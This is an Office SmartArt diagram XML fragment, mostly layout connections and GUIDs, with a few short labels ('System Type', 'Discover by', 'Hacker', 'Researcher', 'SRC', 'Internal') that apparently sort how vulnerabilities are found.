    <dgm:cxn modelId="{3929EA20-4C3A-4ED1-93F7-014EBD3C2D9F}" srcId="{777F138A-2C4D-489A-8051-DAD46185B556}" destId="{E2129DD3-283F-4B32-89AA-13BE9F18EA46}" srcOrd="6" destOrd="0" parTransId="{120A541B-D76D-4393-9D07-CF0DB3197D4C}" sibTransId="{A239001F-66D7-42C8-B84A-056F2F7FE4E5}"/>
    <dgm:cxn modelId="{CFF91928-ACA9-4961-B9A0-52AF8BDE825E}" type="presOf" srcId="{C2CD0544-D567-44C3-BE5D-EC15E648C5DE}" destId="{D4C8E0A9-44B0-448F-BA09-3D3A3CD37C08}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{82BE8638-30D4-4EBE-8D50-167F6BB3DC8C}" type="presOf" srcId="{2CF91A28-D67E-4575-83E3-B6BA37EDDED1}" destId="{48931127-ABD4-4DD2-B984-08D0D8CD79F5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{044F706A-F633-4824-B14A-5B8C05AA57C7}" type="presOf" srcId="{777F138A-2C4D-489A-8051-DAD46185B556}" destId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{3F064558-BB8E-46F6-A8F4-5DCF647A6185}" srcId="{777F138A-2C4D-489A-8051-DAD46185B556}" destId="{02CD7472-5053-4479-B93D-AFEAC33845B8}" srcOrd="4" destOrd="0" parTransId="{84E70964-A4CE-4854-B248-2208779DA0BB}" sibTransId="{1DE87F07-A18E-4842-8BE1-6818381D27DB}"/>
    <dgm:cxn modelId="{A728F582-F840-4EF2-8BA6-5CC8F7264F79}" srcId="{777F138A-2C4D-489A-8051-DAD46185B556}" destId="{2CF91A28-D67E-4575-83E3-B6BA37EDDED1}" srcOrd="2" destOrd="0" parTransId="{380FD181-0F3F-4345-AC37-4C800CFA0FDD}" sibTransId="{E034025D-255E-4A69-8A85-BF060A84B9E4}"/>
    <dgm:cxn modelId="{17A875B3-00FE-4FA6-95DF-8C82884652B2}" type="presOf" srcId="{B7B29033-8268-4A93-AFFD-3CDF696721C2}" destId="{CA41862D-8759-499E-BE04-DD513795BC59}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{7380E0CD-D1F5-4F0E-AF3E-F40F8B4856EE}" type="presOf" srcId="{AF586BEE-D4D6-4CEC-AC1D-B80FA142FA4D}" destId="{61AC6FEA-7520-4EC2-BBBC-746EC4E12C78}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{CEF1B0D2-15AF-45BB-9F69-7D4CB63A1415}" srcId="{777F138A-2C4D-489A-8051-DAD46185B556}" destId="{B7B29033-8268-4A93-AFFD-3CDF696721C2}" srcOrd="0" destOrd="0" parTransId="{254F7C99-6FD4-481D-843F-C67E3896017C}" sibTransId="{E48FFFC7-7CCD-4D74-BA0D-6D6503096438}"/>
    <dgm:cxn modelId="{0D36BAD9-C0A7-436F-86DA-59F211B8FE33}" srcId="{777F138A-2C4D-489A-8051-DAD46185B556}" destId="{AF586BEE-D4D6-4CEC-AC1D-B80FA142FA4D}" srcOrd="1" destOrd="0" parTransId="{383B401F-3F6C-4F14-BF2D-A30B6E60498B}" sibTransId="{73EE58CF-D230-44CD-97A0-FBFE83275AA4}"/>
    <dgm:cxn modelId="{84E01BE9-86DC-4723-BFF2-81AFAEFD9C10}" type="presOf" srcId="{02CD7472-5053-4479-B93D-AFEAC33845B8}" destId="{AC571F17-C613-4440-9AE3-3B7CC47777EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{66C245F3-7FAA-4CEE-A252-B2D36DF31581}" srcId="{777F138A-2C4D-489A-8051-DAD46185B556}" destId="{6447093E-44B0-4C0F-84A8-C2E38FCFEFAE}" srcOrd="5" destOrd="0" parTransId="{F4CAA07E-7AAD-4D39-95A6-8551CFEEAAC4}" sibTransId="{86B6F120-68B6-47B2-BFA0-310A11577EF5}"/>
    <dgm:cxn modelId="{F411D850-9376-47ED-B352-D816746A5B86}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{E6B515EF-5BB0-47EB-B53C-E8217CA641B9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{33750691-16C4-4D1C-B07B-13032B59B2E4}" type="presParOf" srcId="{E6B515EF-5BB0-47EB-B53C-E8217CA641B9}" destId="{9E061137-81B2-4ECE-AB25-522714A6B5C0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{0A834B21-1FEC-40A9-85E8-840865BCF208}" type="presParOf" srcId="{E6B515EF-5BB0-47EB-B53C-E8217CA641B9}" destId="{CA41862D-8759-499E-BE04-DD513795BC59}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{A7FA9D6A-9C36-40A1-9A6B-3259C5FA9936}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{82A84D0B-04AC-4DCD-8A5F-5B1A4728DD8D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{D3D5A5BA-A019-40E1-BD12-32BB7CB37B8A}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{2A173FD5-2AF0-43C9-9019-12E94FBB4DB2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{B83C724A-CF05-48A2-B88E-B62004C737FA}" type="presParOf" srcId="{2A173FD5-2AF0-43C9-9019-12E94FBB4DB2}" destId="{03371F69-22F7-4904-80B1-1FD60AA6EA08}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{9A873427-AA01-44DD-8578-C351508D91D8}" type="presParOf" srcId="{2A173FD5-2AF0-43C9-9019-12E94FBB4DB2}" destId="{61AC6FEA-7520-4EC2-BBBC-746EC4E12C78}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{2DD2A9C4-2AA5-4E82-B646-1A29E83488B3}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{FDDC9E00-19C7-4546-B627-C59745F626D3}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{20CF7446-0F7F-4B0E-9AAF-2DD35C489D6F}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{10A008DE-4A4B-4C65-B53E-6FB5580678A8}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{AE39F4B6-5BC5-479F-AF1F-2511216AC897}" type="presParOf" srcId="{10A008DE-4A4B-4C65-B53E-6FB5580678A8}" destId="{8CC709BE-1E60-493D-8CA9-144586666C58}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{1E9F8AB5-5B9F-47BE-A3E5-EAEC0B2960FA}" type="presParOf" srcId="{10A008DE-4A4B-4C65-B53E-6FB5580678A8}" destId="{48931127-ABD4-4DD2-B984-08D0D8CD79F5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{10286602-6179-4505-83CC-17ADD0AA7188}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{FCB81395-D76A-4474-BDCE-1B43B75CFBFB}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{BCE7BB19-40AD-4448-8488-38E65D8C5782}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{FEE02288-FAD6-4366-965F-58F7404B784A}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{0CC835FE-0AAC-4597-BF1F-719DFCFDBDEE}" type="presParOf" srcId="{FEE02288-FAD6-4366-965F-58F7404B784A}" destId="{F92447D1-0983-437A-961F-5D47637340EB}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{32638391-EB48-4B51-860B-EB23AE42495F}" type="presParOf" srcId="{FEE02288-FAD6-4366-965F-58F7404B784A}" destId="{D4C8E0A9-44B0-448F-BA09-3D3A3CD37C08}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{75F4C3C3-E05D-47B0-B5FB-58AFAA462AFD}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{756A3D41-D02A-44B0-B2D3-28E34F0BFEBE}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{F96CA278-37F5-4A4B-9C71-5B49B6628BF1}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{8BCD2D55-122F-4A9C-81DF-E46BE8FC6D50}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{7E388051-D14D-42B4-8DC7-26174836EF4C}" type="presParOf" srcId="{8BCD2D55-122F-4A9C-81DF-E46BE8FC6D50}" destId="{33A651F8-FC14-4BFE-9C72-CEF93A74B212}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{54BFD458-03F9-48A4-923D-F238E20C399C}" type="presParOf" srcId="{8BCD2D55-122F-4A9C-81DF-E46BE8FC6D50}" destId="{AC571F17-C613-4440-9AE3-3B7CC47777EC}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{5D985626-9C14-4D0E-96B2-12A4AED82CB7}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{0890D238-B059-476C-A188-8FE751F4DA15}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{319D2E39-B72D-4C9D-B7B3-3CB6ADDA3096}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{88517F13-670A-4045-9B23-5DC9D030E71E}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{17069D05-FCB5-4C46-B7F9-0DEACE877FFF}" type="presParOf" srcId="{88517F13-670A-4045-9B23-5DC9D030E71E}" destId="{77AAD59D-F5F8-439E-A30A-A77EE86298AC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{06A96FCF-CAEE-4429-B885-DF0AD6B79DE2}" type="presParOf" srcId="{88517F13-670A-4045-9B23-5DC9D030E71E}" destId="{77A69956-0F53-4D30-BEBA-9AEC5EF69A3B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{49307809-C61E-4950-B252-1C4EBFC527B3}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{E677F193-F20D-4735-970A-C68AA425323C}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{5E43B8C1-3C6B-4CF3-B230-F8F410C81677}" type="presParOf" srcId="{C6031FB7-2174-40F6-8204-8F82A6448C2F}" destId="{F756CB24-C2E6-4C12-8960-166AF7411DD8}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{81FF06D8-6E8F-4285-BAA6-F80037C5F57E}" type="presParOf" srcId="{F756CB24-C2E6-4C12-8960-166AF7411DD8}" destId="{F5DBD06F-6BAC-402A-B9AF-DA3C8E626C6F}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/chevronAccent+Icon"/>
    <dgm:cxn modelId="{D9EB04EB-F7BD-4159-B35B-DE01FB80344B}" type="presParOf" srcId="{F756CB24-C2E6-4C12-8960-166AF7411DD8}" destId="{D8D87454-8007-4B52-B763-2E00EBDEE8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5F3A0A-40C0-4605-B7DF-883323947D8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7E69BAF-629E-454A-AA1A-2F8EF9DB5A5F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>System Type</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87815049-65B4-4403-9C07-F77485FE1820}" type="parTrans" cxnId="{F230F369-9313-495A-8B59-994077A24EE4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{833A5526-2DE4-434E-A200-E4DD0F1A74E5}" type="sibTrans" cxnId="{F230F369-9313-495A-8B59-994077A24EE4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4D5EAA21-E405-42C2-94E8-F4271CA61841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A84EAA74-D198-4957-BD64-4B498B27E664}" type="parTrans" cxnId="{80895666-D8A7-4B05-B013-9D04118A5AF3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9D3A10F3-E7F7-4B95-A2A8-C98288E45A4E}" type="sibTrans" cxnId="{80895666-D8A7-4B05-B013-9D04118A5AF3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F87B42A6-1858-45C0-BB19-BB93C7684F34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61800997-A18F-4809-BE87-81283D7183DB}" type="parTrans" cxnId="{556605D2-7335-45FB-A303-48623A773973}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3D28D171-767C-44E6-A250-6B3C96364151}" type="sibTrans" cxnId="{556605D2-7335-45FB-A303-48623A773973}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8AC0DBFC-15D2-4958-9C79-4419553F3C3E}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Discover by</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E24ADC09-A5FF-4860-8BA4-53310D9DEDF9}" type="parTrans" cxnId="{E1CAFE67-7568-44BD-B9C1-054B7F0C2FD3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A6502F06-3CF6-44DA-B43D-F1BEED6D2169}" type="sibTrans" cxnId="{E1CAFE67-7568-44BD-B9C1-054B7F0C2FD3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{54C92CCD-50CF-47A2-9764-D271E3D13047}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Hacker</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{08114566-4167-4E33-B231-7FF153134FDD}" type="parTrans" cxnId="{12582565-4074-43D6-A914-0E1D58D9B514}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3476ABED-C5E1-43FE-823A-B58ABC43E617}" type="sibTrans" cxnId="{12582565-4074-43D6-A914-0E1D58D9B514}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{863E0315-036A-4956-9CB3-B1A2E3BE2971}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Researcher</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{32236D78-D3D4-4630-B541-EBAC1E5859B5}" type="parTrans" cxnId="{F9E73616-91E5-444F-8FF3-A787CFC76D70}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CD8906CD-C5D1-49BC-92C3-CDB6B437C604}" type="sibTrans" cxnId="{F9E73616-91E5-444F-8FF3-A787CFC76D70}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{86DBD3B5-90C1-4F10-B2ED-EE71CA011DD2}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>SRC</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{23AA047A-7E69-4E74-AD35-502AFCF479B9}" type="parTrans" cxnId="{0CA0F825-3943-462C-A2C4-CB031B3B88FF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D0D44505-9A3F-40C8-AAB3-5D8817DB028B}" type="sibTrans" cxnId="{0CA0F825-3943-462C-A2C4-CB031B3B88FF}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{406622DF-9939-4D17-9B9E-DF0B4A1D09D1}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Internal</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{839CFCD6-14F0-4943-8113-C2BF18ACBA8C}" type="parTrans" cxnId="{F5BE6EF6-3605-4043-8358-69871880F63E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{40DBF7FD-BDDD-4866-82C7-F58DEF2011BA}" type="sibTrans" cxnId="{F5BE6EF6-3605-4043-8358-69871880F63E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E47A2C7E-A214-4779-A6E4-4A84B35218CD}" type="pres">
      <dgm:prSet presAssocID="{515F3A0A-40C0-4605-B7DF-883323947D86}" presName="theList" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7CE07F30-40A7-4FA3-B81B-C4E5EB17283F}" type="pres">
      <dgm:prSet presAssocID="{97E69BAF-629E-454A-AA1A-2F8EF9DB5A5F}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{15C67451-F852-416D-B536-9AF2C3BEFFA0}" type="pres">
      <dgm:prSet presAssocID="{97E69BAF-629E-454A-AA1A-2F8EF9DB5A5F}" presName="aNode" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{83573091-3D12-4EF2-81F5-5368F43F2A7B}" type="pres">
      <dgm:prSet presAssocID="{97E69BAF-629E-454A-AA1A-2F8EF9DB5A5F}" presName="textNode" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BAF22914-1FC6-462F-BC61-349E9771BFF7}" type="pres">
      <dgm:prSet presAssocID="{97E69BAF-629E-454A-AA1A-2F8EF9DB5A5F}" presName="compChildNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A32E734A-7850-4A87-8BD8-81F24492EEC5}" type="pres">
      <dgm:prSet presAssocID="{97E69BAF-629E-454A-AA1A-2F8EF9DB5A5F}" presName="theInnerList" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1C5DB53E-95D1-42B1-AA3C-6A1E4024C870}" type="pres">
      <dgm:prSet presAssocID="{4D5EAA21-E405-42C2-94E8-F4271CA61841}" presName="childNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7367F9EB-A45E-4B08-B696-915FFE94E460}" type="pres">
      <dgm:prSet presAssocID="{4D5EAA21-E405-42C2-94E8-F4271CA61841}" presName="aSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6E889B6F-33F1-4FDA-95B1-A25C2B88830B}" type="pres">
      <dgm:prSet presAssocID="{F87B42A6-1858-45C0-BB19-BB93C7684F34}" presName="childNode" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C42BCC90-9EE1-42D2-98A5-FE3530B1A068}" type="pres">
      <dgm:prSet presAssocID="{97E69BAF-629E-454A-AA1A-2F8EF9DB5A5F}" presName="aSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{24F65306-35EC-4C88-AE15-6C3FB50AC939}" type="pres">
      <dgm:prSet presAssocID="{8AC0DBFC-15D2-4958-9C79-4419553F3C3E}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3DF0B4F8-4B35-45E9-BCC7-C2DFC4E82F4B}" type="pres">
      <dgm:prSet presAssocID="{8AC0DBFC-15D2-4958-9C79-4419553F3C3E}" presName="aNode" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E052CEF5-FB42-453B-8728-D0CFC7487997}" type="pres">
      <dgm:prSet presAssocID="{8AC0DBFC-15D2-4958-9C79-4419553F3C3E}" presName="textNode" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D1676439-6A2E-4F5A-8A09-AED258D8ABDB}" type="pres">
      <dgm:prSet presAssocID="{8AC0DBFC-15D2-4958-9C79-4419553F3C3E}" presName="compChildNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8EF4DC56-B594-499B-99BD-C354B2ACFA76}" type="pres">
      <dgm:prSet presAssocID="{8AC0DBFC-15D2-4958-9C79-4419553F3C3E}" presName="theInnerList" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3027C50A-40FC-4FEB-B8A9-9DB283F47522}" type="pres">
      <dgm:prSet presAssocID="{54C92CCD-50CF-47A2-9764-D271E3D13047}" presName="childNode" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BAA92624-C2D4-4BDF-BFD5-AEAFF8BC5404}" type="pres">
      <dgm:prSet presAssocID="{54C92CCD-50CF-47A2-9764-D271E3D13047}" presName="aSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F633FE13-E954-482B-9409-8AE8B5800A60}" type="pres">
      <dgm:prSet presAssocID="{863E0315-036A-4956-9CB3-B1A2E3BE2971}" presName="childNode" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CEFACD33-24AB-436C-B30F-EE8F6078FB0F}" type="pres">
      <dgm:prSet presAssocID="{863E0315-036A-4956-9CB3-B1A2E3BE2971}" presName="aSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{48E3FBAF-4C73-4F98-B92D-687663F466E9}" type="pres">
      <dgm:prSet presAssocID="{86DBD3B5-90C1-4F10-B2ED-EE71CA011DD2}" presName="childNode" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="6">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D1CF66EA-0A26-4345-9A76-7462840FC196}" type="pres">
      <dgm:prSet presAssocID="{86DBD3B5-90C1-4F10-B2ED-EE71CA011DD2}" presName="aSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{57E9720B-0829-4B08-AC67-6151DD908588}" type="pres">
      <dgm:prSet presAssocID="{406622DF-9939-4D17-9B9E-DF0B4A1D09D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E73616-91E5-444F-8FF3-A787CFC76D70}" srcId="{8AC0DBFC-15D2-4958-9C79-4419553F3C3E}" destId="{863E0315-036A-4956-9CB3-B1A2E3BE2971}" srcOrd="1" destOrd="0" parTransId="{32236D78-D3D4-4630-B541-EBAC1E5859B5}" sibTransId="{CD8906CD-C5D1-49BC-92C3-CDB6B437C604}"/>
